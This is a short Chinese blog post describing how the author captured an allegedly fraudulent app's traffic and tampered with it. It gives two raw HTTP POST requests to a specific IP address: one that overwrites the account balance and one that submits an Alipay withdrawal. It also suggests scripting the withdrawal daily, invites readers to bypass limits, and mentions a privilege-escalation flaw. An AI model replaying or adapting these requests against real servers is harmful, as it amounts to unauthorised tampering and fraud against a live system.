首先我用模拟器下载骗子APP--登录
1.png
点击运行抓包
2.png

post包如下

POST /jine.html HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
Host: 47.111.99.93:7701
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.10.0

user=用户名&mysqlid=1305151&jine=修改的余额&dayje=10000&time=

把包改一下发送
3.png
解码一下
4.png
提现一下抓一下包

POST /tixian.html HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 119
Host: 47.111.99.93:7701
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.10.0

user=用户名&txje=1.0&txzh=支付宝账号(不支持邮箱账号)&txxm=支付宝名字(需要url编码)&txsantime=&txtime=&vip=0&mac=手机的mac地址&app=app

6.png
发送一下
7.png
解码
8.png

然后可以挂在服务器是每天post请求一下提现包,大佬可以尝试一下绕过,该app还存在水平越权漏洞。
骗子网站:https://yy.zdmsl.cn/index.html

温馨提示
千万不要充值

最后修改:2021 年 03 月 28 日 11 : 16 PM
如果觉得我的文章对你有用,请随意赞赏